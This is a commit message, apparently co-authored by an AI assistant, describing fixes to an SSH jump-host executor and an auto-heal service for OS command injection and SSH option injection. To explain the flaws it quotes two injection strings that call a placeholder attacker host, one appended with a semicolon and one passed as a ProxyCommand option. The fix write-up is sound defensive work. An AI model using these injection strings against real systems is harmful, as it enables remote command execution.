20e83306fe
All checks were successful
CD Pipeline / deploy (push) Successful in 1m19s
Issues fixed: 1. [HIGH] OS Command Injection in execute_command() (CWE-78) command was accepted as a string and passed as the final SSH positional arg. Remote SSH executes it via sh -c, so shell metacharacters in command (semicolons, pipes, backticks) are interpreted. e.g. command="id; curl attacker.com" → two commands execute on target. Fix: command parameter changed to List[str]; TypeError raised if str is passed; SSH cmd built with ['--, *command] so remote shell sees argv, not a shell string. '--' stops SSH from interpreting options. 2. [HIGH] SSH Option Injection via host/user parameters (CWE-88) jump_host, target_host, jump_user, target_user were unsanitized. Attacker-controlled host like "-oProxyCommand=curl attacker.com #" could inject SSH options. Fix: _validate_host() / _validate_user() with strict regex on init and in execute_command(); ValueError raised on invalid input. 3. [BUG] AutoHealService.handle_exception() did not exist elephant_alpha_autonomous_engine.py imports and calls AutoHealService().handle_exception() — this would raise AttributeError at runtime. AutoHealService is now fully implemented: - Playbook lookup from DB (autoheal_models.Playbook) - ALLOWED_ACTION_TYPES allowlist (DOCKER_RESTART/WAIT_RETRY/ALERT_ONLY/SSH_CMD) - DOCKER_RESTART: static ['docker','restart',<validated_container>] - SSH_CMD: requires action_params.argv as list; host/user validated 4. [DESIGN] Duplicate SSHJumpExecutor across two files auto_heal_service.py and openclaw_strategist_service.py were byte-for- byte copies. Single source of truth now in auto_heal_service.py; openclaw_strategist_service.py re-exports SSHJumpExecutor. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
